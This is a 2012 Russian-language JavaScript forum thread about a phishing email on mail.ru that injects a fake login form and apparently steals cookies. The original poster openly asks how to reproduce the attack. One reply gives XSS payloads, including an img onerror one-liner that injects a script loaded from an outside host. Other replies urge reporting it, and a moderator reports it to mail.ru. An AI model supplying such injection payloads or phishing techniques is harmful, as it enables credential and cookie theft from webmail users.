Страница 1 из 5 1 23 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Javascript-форум (https://javascript.ru/forum/)
-   Оффтопик (https://javascript.ru/forum/offtopic/)
-   -   очень интересный фишинг (https://javascript.ru/forum/offtopic/28294-ochen-interesnyjj-fishing.html)

vagabunt 14.05.2012 10:23
очень интересный фишинг
 
Здравствуйте, уважаемые.

Дело тут такое. Пришло вчера мне на почту письмо, (mail.ru)



с темой документы срочно. Открываю меня сразу перекидывает в папку входящие





Но я думаю глюк какой то. Через 30 секунд всплывает аут форма.



Форма отправляет данные на парсер, который находится на холмах. (hut.ru)


Я попытался сделать такую фичу самостоятельно. Вытащил html из тела письма. Но чет не получается.

Кто бы мне мог помочь в этом деле? Товарищи знатоки.

Спасибо за внимание)

melky 14.05.2012 10:42
картинки бы посжимать, а то вёрстка поехала ... ну да ладно

меня бы как пользователя, насторожило бы это



красненькой стрелочкой помечено что-то неведомое (ломание вёрстки, xss?)

красненьким овальчиком - это похоже на ajax spinner с facebook, что оно тут делает?

PS наконец то попробовал gimp 2.8

vagabunt 14.05.2012 11:08
Где изображение там это.



Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

PS. Сюда скопировать не мог, так как превышает 10000 символов

А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает
такую вот штучку

vagabunt 14.05.2012 11:21
Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)

B@rmaley.e><e 14.05.2012 11:28
Цитата:
Сообщение от vagabunt
Ведет на js файл с этим содержанием.

http://zalil.ru/33232691
А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)

vagabunt 14.05.2012 11:36
Цитата:
Сообщение от B@rmaley.e><e (Сообщение 174382)
А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

Kolyaj 14.05.2012 14:12
vagabunt,
а исходник письма можете показать?

Илья Кантор 14.05.2012 14:31
Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;)

melky 14.05.2012 14:53
Цитата:
Сообщение от vagabunt (Сообщение 174388)
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)
обычная xss ... вот пример покруче 
<img src onerror=alert('XSS')>

вместо alert'а можно подставить, что хочешь.

и кстати, скрипт можно было вставить короче :
<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>


только вот вопрос.. как оно на mail.ru прошло?

vagabunt 14.05.2012 15:31
Цитата:
Сообщение от Илья Кантор (Сообщение 174426)
Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;)
Вот топикстартер не фига не за:)

Топикустартеру интересно)) какой скрипт отсылают через сендер)


Часовой пояс GMT +3, время: 23:28.
Страница 1 из 5 1 23 > Последняя »
Показывать 40 сообщений этой темы на одной странице